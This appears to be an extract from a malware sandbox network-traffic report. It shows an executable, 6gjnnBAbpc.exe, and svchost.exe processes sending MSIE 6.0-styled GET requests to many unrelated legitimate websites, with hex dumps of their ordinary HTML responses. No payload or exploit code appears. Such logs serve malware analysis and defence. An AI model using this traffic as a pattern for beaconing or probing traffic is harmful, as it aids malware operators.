2023-03-22 04:45:07 UTC	669	IN	Data Raw: 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 2c 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 3f 28 61 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 22 2c 6e 2c 21 31 29 2c 65 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 6c 6f 61 64 22 2c 6e 2c 21 31 29 29 3a 28 65 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 6c 6f 61 64 22 2c 6e 29 2c 61 2e 61 74 74 61 63 68 45 76 65 6e 74 28 22 6f 6e 72 65 61 64 79 73 74 61 74 65 63 68 61 6e 67 65 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 22 63 6f 6d 70 6c 65 74 65 22 3d 3d 3d 61 2e 72 65 61 64 79 53 74 61 74 65 26 26 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 28 29 7d 29 29 2c 28 6e 3d 74 2e 73 6f 75 72 63 65 7c 7c 7b 7d 29 2e 63 6f 6e Data Ascii: readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onload",n),a.attachEvent("onreadystatechange",function(){"complete"===a.readyState&&t.readyCallback()})),(n=t.source\|\|{}).con
2023-03-22 04:45:07 UTC	678	IN	Data Raw: 36 20 30 2e 34 20 30 2e 38 3b 30 2e 32 20 30 2e 38 20 30 2e 34 20 30 2e 38 27 20 63 61 6c 63 4d 6f 64 65 3d 27 73 70 6c 69 6e 65 27 20 20 2f 25 33 45 20 20 20 25 33 43 2f 70 61 74 68 25 33 45 20 20 20 25 33 43 70 61 74 68 20 74 72 61 6e 73 66 6f 72 6d 3d 27 74 72 61 6e 73 6c 61 74 65 28 31 34 29 27 20 64 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 25 33 45 20 20 20 20 20 25 33 43 61 6e 69 6d 61 74 65 20 61 74 74 72 69 62 75 74 65 4e 61 6d 65 3d 27 64 27 20 76 61 6c 75 65 73 3d 27 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 34 20 56 32 38 20 48 34 20 56 34 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 3b 20 4d 30 20 31 32 20 56 32 30 20 48 34 20 56 31 32 7a 27 20 64 75 72 3d 27 31 2e 32 73 27 20 72 65 70 Data Ascii: 6 0.4 0.8;0.2 0.8 0.4 0.8' calcMode='spline' /%3E %3C/path%3E %3Cpath transform='translate(14)' d='M0 12 V20 H4 V12z'%3E %3Canimate attributeName='d' values='M0 12 V20 H4 V12z; M0 4 V28 H4 V4z; M0 12 V20 H4 V12z; M0 12 V20 H4 V12z' dur='1.2s' rep
2023-03-22 04:45:07 UTC	686	IN	Data Raw: 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 72 65 76 73 6c 69 64 65 72 2f 70 75 62 6c 69 63 2f 61 73 73 65 74 73 2f 6a 73 2f 6a 71 75 65 72 79 2e 74 68 65 6d 65 70 75 6e 63 68 2e 72 65 76 6f 6c 75 74 69 6f 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 35 2e 34 2e 38 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 77 63 5f 61 64 64 5f 74 6f 5f 63 61 72 74 5f 70 61 72 61 6d 73 3d 7b 22 61 6a 61 78 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f Data Ascii: ript' src='https://dataform.co.uk/wp-content/plugins/revslider/public/assets/js/jquery.themepunch.revolution.min.js?ver=5.4.8'></script><script type='text/javascript'>//<![CDATA[var wc_add_to_cart_params={"ajax_url":"https:\/\/dataform.co.uk\/wp-admin\/
2023-03-22 04:45:07 UTC	694	IN	Data Raw: 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 37 36 78 37 36 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 32 33 2f 30 31 2f 44 46 2d 69 63 6f 6e 2d 6c 6f 67 6f 2e 73 76 67 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 73 69 7a 65 73 3d 22 31 32 30 78 31 32 30 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 Data Ascii: tps://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="76x76" href="https://dataform.co.uk/wp-content/uploads/2023/01/DF-icon-logo.svg"><link rel="apple-touch-icon" sizes="120x120" href="https://dataform.co.u
2023-03-22 04:45:07 UTC	703	IN	Data Raw: 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 35 34 30 34 30 22 3e 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 70 72 69 63 69 6e 67 2f 27 20 64 61 74 61 2d 6c 65 76 65 6c 3d 27 31 27 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 2d 74 65 78 74 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 74 65 78 74 22 3e 50 72 69 63 69 6e 67 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 20 3c 6c 69 20 63 6c 61 73 73 3d 22 6d 65 6e 75 2d 69 74 65 6d 20 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6d 65 6e 75 2d 69 Data Ascii: menu-item-object-page menu-item-54040"><a href='https://dataform.co.uk/pricing/' data-level='1'><span class="menu-item-text"><span class="menu-text">Pricing</span></span></a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-i
2023-03-22 04:45:07 UTC	711	IN	Data Raw: 2d 66 6f 72 6d 2d 37 5c 2f 76 31 22 7d 7d 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 63 6f 6e 74 61 63 74 2d 66 6f 72 6d 2d 37 2f 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 73 63 72 69 70 74 73 2e 6a 73 3f 76 65 72 3d 35 2e 31 2e 33 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 73 72 63 3d 27 68 74 74 70 73 3a 2f 2f 64 61 74 61 66 6f 72 6d 2e 63 6f 2e 75 6b 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 67 6f 5f 70 72 69 63 69 6e Data Ascii: -form-7\/v1"}};//...</script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/contact-form-7/includes/js/scripts.js?ver=5.1.3'></script><script type='text/javascript' src='https://dataform.co.uk/wp-content/plugins/go_pricin

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	50171	138.201.65.187	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:44:27 UTC	51	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: www.diamir.de
2023-03-22 04:44:27 UTC	51	IN	HTTP/1.1 403 Forbidden Server: nginx Date: Wed, 22 Mar 2023 04:44:27 GMT Content-Type: text/html Content-Length: 548 Connection: close Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
2023-03-22 04:44:27 UTC	52	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
20	192.168.2.5	62416	188.114.97.3	443	C:\Users\user\Desktop\6gjnnBAbpc.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	335	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: hyab.se
2023-03-22 04:45:06 UTC	350	IN	HTTP/1.1 302 Found Date: Wed, 22 Mar 2023 04:45:06 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Location: https://hyab.com Cache-Control: max-age=600 Expires: Wed, 22 Mar 2023 04:55:06 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=qR5PHbgHvv4wI36XnyqdG0rN1PEfiGExifZeKVLXPBDoZJaYzCuJJXKpl7j2Fvb578u35qyvQ3O4VST0eIDMtvyKHuq6dpXvLMkN9BFO10SsL7m%2ByP%2FhrJIw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc88529a6900c-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:06 UTC	351	IN	Data Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
2023-03-22 04:45:06 UTC	351	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
21	192.168.2.5	60953	185.237.66.112	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	335	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: techtrans.de
2023-03-22 04:45:06 UTC	337	IN	HTTP/1.1 403 Forbidden Date: Wed, 22 Mar 2023 04:45:06 GMT Server: Apache Pragma: no-cache Cache-Control: no-cache, no-store, must-revalidate Expires: 0 X-XSS-Protection: 1; mode=block Upgrade: h2,h2c Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2023-03-22 04:45:06 UTC	337	IN	Data Raw: 32 64 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 69 6e 6a 61 46 69 72 65 77 61 6c 6c 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 7d 3c 2f 73 74 79 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 2f 68 65 61 64 3e 3c Data Ascii: 2de<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>NinjaFirewall 403 Forbidden</title><style>body{font-family:sans-serif;font-size:13px;color:#000;}</style><meta http-equiv="Content-Type" content="text/html; charset=utf-8"></head><

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
22	192.168.2.5	59805	138.201.65.187	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	335	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: diamir.de
2023-03-22 04:45:06 UTC	337	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 22 Mar 2023 04:45:06 GMT Content-Type: text/html Content-Length: 162 Connection: close Location: https://www.diamir.de/ Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
2023-03-22 04:45:06 UTC	337	IN	Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
23	192.168.2.5	60665	91.229.22.126	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	336	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: pleszew.policja.gov.pl
2023-03-22 04:45:06 UTC	354	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 22 Mar 2023 04:45:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding
2023-03-22 04:45:06 UTC	355	IN	Data Raw: 31 66 63 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 22 3e 0d 0a 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 20 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 6e 64 65 78 2c 20 46 6f 6c 6c 6f 77 22 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 4b 50 50 20 50 6c 65 Data Ascii: 1fc0<!DOCTYPE html><html lang="pl"> <head> <meta charset="UTF-8"/> <meta name="description" content=" "/> <meta name="keywords" content=""/> <meta name="robots" content="Index, Follow"/> <meta name="author" content="KPP Ple
2023-03-22 04:45:06 UTC	411	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 72 2d 6f 6e 6c 79 22 3e 44 61 74 61 20 70 75 62 6c 69 6b 61 63 6a 69 3a 20 3c 2f 73 70 61 6e 3e 3c 69 20 63 6c 61 73 73 3d 22 66 61 20 66 61 2d 63 6c 6f 63 6b 2d 6f 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 20 30 33 2e 31 30 2e 32 30 32 32 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 32 30 30 30 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 3c 2f 61 72 74 69 63 6c 65 3e 0d 0a 20 20 20 20 20 0d 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 20 20 20 20 0d 0a 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 21 2d 2d 20 20 74 6f 70 6e 65 77 73 2e 20 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 20 63 6f Data Ascii: <span class="sr-only">Data publikacji: </span><i class="fa fa-clock-o" aria-hidden="true"></i> 03.10.2022 </div>2000 </div> </article> </section> </section></div>... topnews. -->... co
2023-03-22 04:45:06 UTC	428	IN	Data Raw: 3a 31 30 70 78 22 3e 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2c 5a 6f 73 74 61 6e 2d 6a 65 64 6e 79 6d 2d 7a 2d 6e 61 73 2d 50 52 41 43 41 2d 57 2d 50 4f 4c 49 43 4a 49 2e 68 74 6d 6c 22 20 74 61 72 67 65 74 3d 22 5f 74 6f 70 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 64 6f 6b 75 6d 65 6e 74 79 2f 62 61 74 6f 6e 79 2f 34 35 39 36 2e 6a 70 67 3f 76 3d 31 36 35 37 31 31 32 36 31 38 22 20 61 6c 74 3d 22 5a 6f 0d 0a 31 30 30 30 0d 0a 73 74 61 c5 84 20 6a 65 64 6e 79 6d 20 7a 20 6e 61 73 20 2d 20 50 52 41 43 41 20 57 20 50 4f 4c 49 43 4a 49 22 20 2f 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0a 09 09 0a 09 0a 09 09 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 69 74 65 6d 22 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 33 30 30 70 78 3b 20 Data Ascii: :10px"><a href="/w20/batony/4596,Zostan-jednym-z-nas-PRACA-W-POLICJI.html" target="_top"><img src="/dokumenty/batony/4596.jpg?v=1657112618" alt="Zo1000sta jednym z nas - PRACA W POLICJI" /></a></div><div class="item" style="width:300px;
2023-03-22 04:45:06 UTC	444	IN	Data Raw: 77 65 72 73 6a 65 20 70 6f 72 74 61 6c 75 3c 2f 68 32 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 2f 77 32 30 2f 77 61 69 22 20 74 69 74 6c 65 3d 22 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 22 20 63 6c 61 73 73 3d 22 77 61 69 22 3e 3c 73 70 61 6e 3e 77 65 72 73 6a 61 20 74 65 6b 73 74 6f 77 61 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 62 72 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 6c 69 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0d 0d 0a 31 38 33 0d 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6c 65 61 72 22 3e 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0d 0a 20 20 20 Data Ascii: wersje portalu</h2> <a href="/w20/wai" title="wersja tekstowa" class="wai"><span>wersja tekstowa</span></a><br /> </li> </ul>183 <div class="clear"></div> </div> </div>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
24	192.168.2.5	61785	172.67.156.49	443	C:\Windows\SysWOW64\svchost.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	336	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: orlyhotel.com Cookie: django_language=en
2023-03-22 04:45:07 UTC	529	IN	HTTP/1.1 500 Internal Server Error Date: Wed, 22 Mar 2023 04:45:07 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Cache-Control: max-age=0, no-store, no-cache, must-revalidate Expires: Wed, 22 Mar 2023 04:34:59 GMT Content-Language: en Last-Modified: Wed, 22 Mar 2023 04:34:59 GMT X-Frame-Options: SAMEORIGIN Vary: Accept-Language CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MApDs%2FoF5947Fly5PhhzZZaHypw%2Ba%2BuiN6tVFiMpbJJ7jbfVoCMUMQHccV6wp4KjHZ1xz1g6%2FE7cIUtzqEaHodIhlaY5VPoRUFep0Bk7JknKAtaljNIUS9gTP3M14flk"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc8856cd530f3-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:07 UTC	530	IN	Data Raw: 31 62 0d 0a 3c 68 31 3e 53 65 72 76 65 72 20 45 72 72 6f 72 20 28 35 30 30 29 3c 2f 68 31 3e 0d 0a Data Ascii: 1b<h1>Server Error (500)</h1>
2023-03-22 04:45:07 UTC	530	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
25	192.168.2.5	61710	188.114.96.3	443	C:\Users\user\Desktop\6gjnnBAbpc.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	336	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: hyab.se
2023-03-22 04:45:06 UTC	351	IN	HTTP/1.1 302 Found Date: Wed, 22 Mar 2023 04:45:06 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Location: https://hyab.com Cache-Control: max-age=600 Expires: Wed, 22 Mar 2023 04:55:06 GMT CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=DKvpRAzTjf8Min6nZX1DtPNugVJuzJuCx5cz848gWAL%2B9RKZuGV4rUJu0heVVJrTtDiqcCCyD7itDJYgTJmqYowv%2FAeQWXtscwfj47Tt28HMnti0NLUCNXxL"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7abbc8856cee3618-FRA alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
2023-03-22 04:45:06 UTC	351	IN	Data Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
2023-03-22 04:45:06 UTC	352	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
26	192.168.2.5	62418	188.114.96.3	443	C:\Users\user\Desktop\6gjnnBAbpc.exe

Timestamp	kBytes transferred	Direction	Data
2023-03-22 04:45:06 UTC	336	OUT	GET / HTTP/1.1 Accept: * Accept-Language: en-us Connection: keep-alive User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) Cache-Control: no-cache Host: sigtoa.com
